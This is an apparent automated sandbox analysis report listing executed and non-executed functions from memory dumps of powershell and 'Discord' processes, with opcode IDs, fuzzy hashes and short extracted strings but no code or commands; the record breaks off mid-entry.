                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41

                                      Non-executed Functions

                                      Function 00007FFD9B7D8995 Relevance: 5.1, Strings: 4, Instructions: 134COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: N_^$N_^$N_^$N_^
                                      • API String ID: 0-3900292545
                                      • Opcode ID: 842d009519e7c2484edc80ccc036ace5dfd69bd6248b23b1356a32c66baa1691
                                      • Instruction ID: 1259941069512258f8cec5da74ba931970a60bf0b13a41eabb5bb331ab8ceaec
                                      • Opcode Fuzzy Hash: 842d009519e7c2484edc80ccc036ace5dfd69bd6248b23b1356a32c66baa1691
                                      • Instruction Fuzzy Hash: 034163A2A0F7D64FE3164BA95C791957FA0EF9226470A43F7C1D8CB0B3ED18150B8356
                                      Function 00007FFD9B7D8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: N_^4$N_^7$N_^F$N_^J
                                      • API String ID: 0-3508309026
                                      • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                      • Instruction ID: 33318d810732aedc5b8d73b2cd603b97cdeee6fc6f3f35bf73613f10f45d9dd5
                                      • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                      • Instruction Fuzzy Hash: 3821497BB080654ED305BBBCBC289DD3750DFD423935642F2D2A9CB183EC14708A86C1

                                      Executed Functions

                                      Function 00007FFD9B8B6605 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2222497725.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7f
                                      • API String ID: 0-4156207988
                                      • Opcode ID: dbf7ea9768f72be3f23def5b5878d115ee95cd69ba57a494644d0eef3e2d41af
                                      • Instruction ID: c462eabe737849c16c34a8d4573fa0b1cd6444d0f2fc7bb4709a520b1e9c4ab5
                                      • Opcode Fuzzy Hash: dbf7ea9768f72be3f23def5b5878d115ee95cd69ba57a494644d0eef3e2d41af
                                      • Instruction Fuzzy Hash: 45D13572A0FA9E4FEB659B7888645B5BBE0EF0A314B0901FED45CC70E3D918E905C781
                                      Function 00007FFD9B7E644D Relevance: .7, Instructions: 719COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2221005169.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b7e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3487309ab8b26002c9f388b36d96d6b8431b393b61375714c39138032a7c8381
                                      • Instruction ID: f90c03aeb680d48c930c6ec07fd866c3558b75cd0e17f14208e99b80cd25cfa1
                                      • Opcode Fuzzy Hash: 3487309ab8b26002c9f388b36d96d6b8431b393b61375714c39138032a7c8381
                                      • Instruction Fuzzy Hash: CCD16031A18A4D8FDF98DF58C465AAD7BE1FF68300F1542AAD449D72B6CB34E841CB81
                                      Function 00007FFD9B8B4073 Relevance: .2, Instructions: 186COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2222497725.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da472695ac8e126ab8aec1e7942b5e85b5b3bd1d3eeec8ee0f6bf409943039cd
                                      • Instruction ID: f43e85095f42df5cd5f44a7b6b6d8c7edc78867ed76815278955e3223d9bc103
                                      • Opcode Fuzzy Hash: da472695ac8e126ab8aec1e7942b5e85b5b3bd1d3eeec8ee0f6bf409943039cd
                                      • Instruction Fuzzy Hash: EC511822F0EA5A0FEBA99B6C542367477D1EF98310B1E00BEC15DC71A3DD15EC068781
                                      Function 00007FFD9B8B4370 Relevance: .1, Instructions: 146COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2222497725.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4ed8bbede882341eb8f161312f4d7b5709d6aaee155d2e15337b5f7496e54c1
                                      • Instruction ID: 0bd5dcccc7f2a38e04cc6b03be813f11c11ed0ff97cb6e9bbf392bac41e8f130
                                      • Opcode Fuzzy Hash: f4ed8bbede882341eb8f161312f4d7b5709d6aaee155d2e15337b5f7496e54c1
                                      • Instruction Fuzzy Hash: 65410633B0EA694FEBB9D7785422AB477D1EF88320B0E00BED059C71A7E915AD1187C1
                                      Function 00007FFD9B7E9750 Relevance: .1, Instructions: 143COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2221005169.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b7e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 449476ddde25d73c4d4e931033806e36a390d8d24c8cec0fc571a7373ac85179
                                      • Instruction ID: fb8fb1c95825fd66476b44514d55ae07e7a95f5a2e60bda4a8687d2ba346a529
                                      • Opcode Fuzzy Hash: 449476ddde25d73c4d4e931033806e36a390d8d24c8cec0fc571a7373ac85179
                                      • Instruction Fuzzy Hash: 0941183190DB884FDB189B5C9C0A6B9BFE0EF95310F04426FE059932A2CA74AD15CBC6
                                      Function 00007FFD9B6CEB80 Relevance: .1, Instructions: 129COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2219632482.00007FFD9B6CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b6cd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fbb765b0eb57dbf4308c443cdbfec82abc470806cc15f3d6d4a58a905086a54a
                                      • Instruction ID: 1bfa19bbe1f0ac6666433526d251c827e69673d674de8975572875d28681116d
                                      • Opcode Fuzzy Hash: fbb765b0eb57dbf4308c443cdbfec82abc470806cc15f3d6d4a58a905086a54a
                                      • Instruction Fuzzy Hash: 0A41277150EBC84FE766AB2898559723FF0EF52220B1605DFD0C9CB1A3D629B846C792
                                      Function 00007FFD9B8B40BF Relevance: .1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2222497725.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 54c25938abdfaf763182f8b0a6558f96501cfc710a24436478b90ce69b500367
                                      • Instruction ID: f5ed2cc5c9d241162acec3801142508062efd2ba1b7c32366983ed73fba6ba3d
                                      • Opcode Fuzzy Hash: 54c25938abdfaf763182f8b0a6558f96501cfc710a24436478b90ce69b500367
                                      • Instruction Fuzzy Hash: 3D21B122F0F9AB4FEBB59B68446357466D1EF68310B5E00BED05DC71B2DE18ED058B81
                                      Function 00007FFD9B7EA49C Relevance: .1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2221005169.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b7e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e8ed430849548e6b02d7a2647ba548c2c5e57a580bf1efe836198531b1d60d9
                                      • Instruction ID: 2c024156510b3bae5b0da70aa95956434f0062f64a5b0fb3814b6bf7b3cd7af4
                                      • Opcode Fuzzy Hash: 9e8ed430849548e6b02d7a2647ba548c2c5e57a580bf1efe836198531b1d60d9
                                      • Instruction Fuzzy Hash: 0E21E93190C74C4FDB59DBAC984A7E97BE0EB96321F04426FD049C3162DA74A416CB92
                                      Function 00007FFD9B8B43BC Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2222497725.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db2ca2784a88b3e53e3fb4a231bf7f9817bec7d2c87ba27407ba21273a3c9b58
                                      • Instruction ID: ed6e97828cd6f68a7aed8767568a8082c97a593c6e71ceecdec733d48e092bcc
                                      • Opcode Fuzzy Hash: db2ca2784a88b3e53e3fb4a231bf7f9817bec7d2c87ba27407ba21273a3c9b58
                                      • Instruction Fuzzy Hash: 4211E333B4F5594FEBB8D76890719B476D1EF4832074E00BAE02DC75A2D919AD108780
                                      Function 00007FFD9B7E33B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2221005169.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b7e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction ID: 347eb46863d0610c54c5e9c05e70889870b2352b4ba84a369cc0dc72dc0b729b
                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction Fuzzy Hash: 6D01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10056DE58AC36A1DA32E882CB41

                                      Non-executed Functions

                                      Function 00007FFD9B7E8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2221005169.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b7e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                      • API String ID: 0-962139525
                                      • Opcode ID: 7e7a3d8de407db449c69fa8481542aeb6a851cff63d93905096c5d76b6b201bf
                                      • Instruction ID: b114a5ea51b1871e90ed1c4dc2c7250fd3b437a7b478e6d328b580f01d32eadd
                                      • Opcode Fuzzy Hash: 7e7a3d8de407db449c69fa8481542aeb6a851cff63d93905096c5d76b6b201bf
                                      • Instruction Fuzzy Hash: BC210477B045658AC30676ACB8559DC7790DF9437A39643F3E029CF193ED18A48B8A80

                                      Executed Functions

                                      Function 00007FFD9B7D16E9 Relevance: .7, Instructions: 701COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e429a3bf5f63afa3ed01209983f7ada0e12f7f95265fb80ac5ef7f2c37fe5e73
                                      • Instruction ID: 5873f4713be78d12f002be0bddb59d7c76976764d7edfe347b56f5138b86f37c
                                      • Opcode Fuzzy Hash: e429a3bf5f63afa3ed01209983f7ada0e12f7f95265fb80ac5ef7f2c37fe5e73
                                      • Instruction Fuzzy Hash: D822A760B19A494FE798EB7884B9BBD77D1FFD8344F450679E00EC32E6DE28A9018741
                                      Function 00007FFD9B7D0E5E Relevance: .3, Instructions: 281COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7aff944eb0ef42b6df6bdb8515ef23c0f642c7ceb352072d80a5c6a40651aa75
                                      • Instruction ID: 5d40d7acdab681f90321f50c0734953b4faa1d41c097a47fac1582ac5b41d10b
                                      • Opcode Fuzzy Hash: 7aff944eb0ef42b6df6bdb8515ef23c0f642c7ceb352072d80a5c6a40651aa75
                                      • Instruction Fuzzy Hash: 37712816F0D6DA0EE356B67C64695F92BA1DFC623970981FBE0CDCA0E7DC0828478352
                                      Function 00007FFD9B7D20C1 Relevance: .2, Instructions: 205COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 423c8cb82b6ae2bec3be225920dad8fb2ac70ce2e947fbb9b1b61fe942d2f605
                                      • Instruction ID: da76a0059c8c8369c333fc7e7eae16a464c09d8827496fe6bcab64f789b3f3ec
                                      • Opcode Fuzzy Hash: 423c8cb82b6ae2bec3be225920dad8fb2ac70ce2e947fbb9b1b61fe942d2f605
                                      • Instruction Fuzzy Hash: 8151FE10B1E6C94FD796ABB888746A57FE5DF87219B0806FBE09DC61E7DD18180AC342
                                      Function 00007FFD9B7D07F2 Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;O_$<O_^
                                      • API String ID: 0-3431308889
                                      • Opcode ID: 357034b920004b4c8101a95bfa011ac73b7f9bba9c368e404dc195da4e12ad36
                                      • Instruction ID: c01658152b9928ca54320e83e96a800dcf1b2c9ffdabab7fcc97fbf7aee20942
                                      • Opcode Fuzzy Hash: 357034b920004b4c8101a95bfa011ac73b7f9bba9c368e404dc195da4e12ad36
                                      • Instruction Fuzzy Hash: EA513636B096894FE344EB6CA0F58E87BA0EFC4319B5145FAD059CB3DBDD286846CB40
                                      Function 00007FFD9B7D11F2 Relevance: 1.8, Strings: 1, Instructions: 580COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: 2614e019dc0551413e1eed5533bc2cdb08dd980c43f033b6c7d609f5afb74794
                                      • Instruction ID: 4a68c39b68360f4ab21b260e31343f9944dcb9c0714d143db9b1e919f7cb6be7
                                      • Opcode Fuzzy Hash: 2614e019dc0551413e1eed5533bc2cdb08dd980c43f033b6c7d609f5afb74794
                                      • Instruction Fuzzy Hash: 70510827F0969A4FD711E76CA4755ED7BB0EFC1225B0A42F6C09DDA1E3DD14284A8390
                                      Function 00007FFD9B7D11F0 Relevance: 1.8, Strings: 1, Instructions: 576COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: d654db4bfd9c6cd7d4085b95c2e69033f97794dfaab368e3dd0f984dbe91eb07
                                      • Instruction ID: 59f2a769a37c4db7ec2aa37e46e0872115bf7bf4429f042e485088314c2b0cee
                                      • Opcode Fuzzy Hash: d654db4bfd9c6cd7d4085b95c2e69033f97794dfaab368e3dd0f984dbe91eb07
                                      • Instruction Fuzzy Hash: 15512627F0969A0ED711F76CA4755ED7BB0EFC1225B0A42F7C09DDA1E3DC18284A8390
                                      Function 00007FFD9B7D12B8 Relevance: .5, Instructions: 487COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e3c2bfb3492a95d2fc633c98424b74a4c5e456f37123d9836262ea891a11834
                                      • Instruction ID: e4055c8bc573909d3fb79d54d9abf3860c0ec48fbe2431dafda36764ab7760f4
                                      • Opcode Fuzzy Hash: 7e3c2bfb3492a95d2fc633c98424b74a4c5e456f37123d9836262ea891a11834
                                      • Instruction Fuzzy Hash: 0031D072B09A8E4FD7509B68D8755EDBBB1FFC5240F4602B6D049E72F6CD242909C350
                                      Function 00007FFD9B7D0AFB Relevance: .2, Instructions: 207COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f61799ed224cec27c2133a62545a65831203e1fc9031aa76684f9848edbe290
                                      • Instruction ID: 1823f9ed0f07d6e53187ac8c53c971fab202e524f49a85d014e790096bf4379d
                                      • Opcode Fuzzy Hash: 2f61799ed224cec27c2133a62545a65831203e1fc9031aa76684f9848edbe290
                                      • Instruction Fuzzy Hash: 3551F436F0865A8BDB44FBACA475AEC73B1EFC432AB11467AD109C72D6CE246845C790
                                      Function 00007FFD9B7D0B6F Relevance: .2, Instructions: 160COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f78ac6aae06cedd4a6517a38a8ac8789aacebe9ab3f7e8179b2a063a84f4de7b
                                      • Instruction ID: d05bd070e4c8d4d7dcf02203073a05512bcc8dcf4d506ab708e42b1b69ecb831
                                      • Opcode Fuzzy Hash: f78ac6aae06cedd4a6517a38a8ac8789aacebe9ab3f7e8179b2a063a84f4de7b
                                      • Instruction Fuzzy Hash: 95411535B04A1E9FDB44FB68D4B1AEC77A1FFC4315B40467AD009C7286CE346846CB80
                                      Function 00007FFD9B7D0638 Relevance: .1, Instructions: 134COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c1b80c0b576bfc09ed1e7a64c7dc5e71518fb62733e1b9c97f3bebaa8b272195
                                      • Instruction ID: c2110545466a82219effd738fff987845ad9677f5f87a8a6780214a24b6ef232
                                      • Opcode Fuzzy Hash: c1b80c0b576bfc09ed1e7a64c7dc5e71518fb62733e1b9c97f3bebaa8b272195
                                      • Instruction Fuzzy Hash: C631D121B1C9490FE798EF6C9469679B2C2EFD8355F0546BEA05EC32E7DD24AC428341
                                      Function 00007FFD9B7D0D48 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                      • Instruction ID: 418a9ea806e1ccd207bb67409d9f687dd55e107c71b91ac69553623695c52f89
                                      • Opcode Fuzzy Hash: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                      • Instruction Fuzzy Hash: 87218415F1490A4BFB84BBBC546E7BC72D2EFD8715F504276E41DC32DADD28A8418392
                                      Function 00007FFD9B7D086D Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f3950b8f4f2d72b357a712d1cdd95363829d356d1898de084803b09f3e0a7f85
                                      • Instruction ID: c848e3836d0425a3efbb7db18599388bedfd78d6fe2ee4f1cb2247d7a5ebe298
                                      • Opcode Fuzzy Hash: f3950b8f4f2d72b357a712d1cdd95363829d356d1898de084803b09f3e0a7f85
                                      • Instruction Fuzzy Hash: 26217F357589895FE784EF58A0F59EDBFB2AFC8204B9148E4E519C33DBCD2869018B41
                                      Function 00007FFD9B7D2291 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0578b6da6b26235d33fb6b6fe0c199fcd114bbde0abd720310bd8e3b253c72a5
                                      • Instruction ID: 6fe4dced4c05c702755ff82bb55534ba8a547dc52ec83a30754235b33acb3a86
                                      • Opcode Fuzzy Hash: 0578b6da6b26235d33fb6b6fe0c199fcd114bbde0abd720310bd8e3b253c72a5
                                      • Instruction Fuzzy Hash: 0F014C14A0E7850FE79156785CB54717FE0CFD125570A07BBE488C60B7D8086B458392

                                      Executed Functions

                                      Function 00007FFD9B7C16E9 Relevance: .7, Instructions: 701COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e6b10825d1b52ddc98c3dcf6d42930fc218764eb367d5b4af13ed1569759a8a4
                                      • Instruction ID: 2dda23a29192cc33e2a6d2b9eab1f811bc7e072f8bbd6695e15bac68e30219f5
                                      • Opcode Fuzzy Hash: e6b10825d1b52ddc98c3dcf6d42930fc218764eb367d5b4af13ed1569759a8a4
                                      • Instruction Fuzzy Hash: 8F22A460B19A495FE798FB688479ABD77D2FF98304F45057DE00EC33E6DE28A8418781
                                      Function 00007FFD9B7C0E5E Relevance: .3, Instructions: 281COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6d3084c4c76b89283af335b51d5909a9a8a9dca81d9e64c7f153bb6a9a43328f
                                      • Instruction ID: 17f1e29269717e528e902e8d4d38c13dba244894e35a9254d08ef26a52441e1d
                                      • Opcode Fuzzy Hash: 6d3084c4c76b89283af335b51d5909a9a8a9dca81d9e64c7f153bb6a9a43328f
                                      • Instruction Fuzzy Hash: AD712A16B0D6950EE356B77C68699F92B91DFC622970981FBE0CDCB1E7DC0818838352
                                      Function 00007FFD9B7C20C1 Relevance: .2, Instructions: 205COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98e2320c35b1fc9376ed98eb9f098ad459fab066d3be27e130c0af708b2d31aa
                                      • Instruction ID: 48277a9c5dc312278284754d7c300de50cc50ec1b7fa87a4fbf87d831345a04a
                                      • Opcode Fuzzy Hash: 98e2320c35b1fc9376ed98eb9f098ad459fab066d3be27e130c0af708b2d31aa
                                      • Instruction Fuzzy Hash: A951EB10A1E6C95FD79AABB848746B67FE5DF87219B0801FEE09DC62E7DD081846C342
                                      Function 00007FFD9B7C07F2 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;P_$<P_^
                                      • API String ID: 0-224043121
                                      • Opcode ID: 2771fe1e29a48573ca540c6db05481e576065ba38b391ee37eead7c65aae9172
                                      • Instruction ID: ba1d7da3e128b61eb4df142024544c76ededff257a84190e00091190302bcfa5
                                      • Opcode Fuzzy Hash: 2771fe1e29a48573ca540c6db05481e576065ba38b391ee37eead7c65aae9172
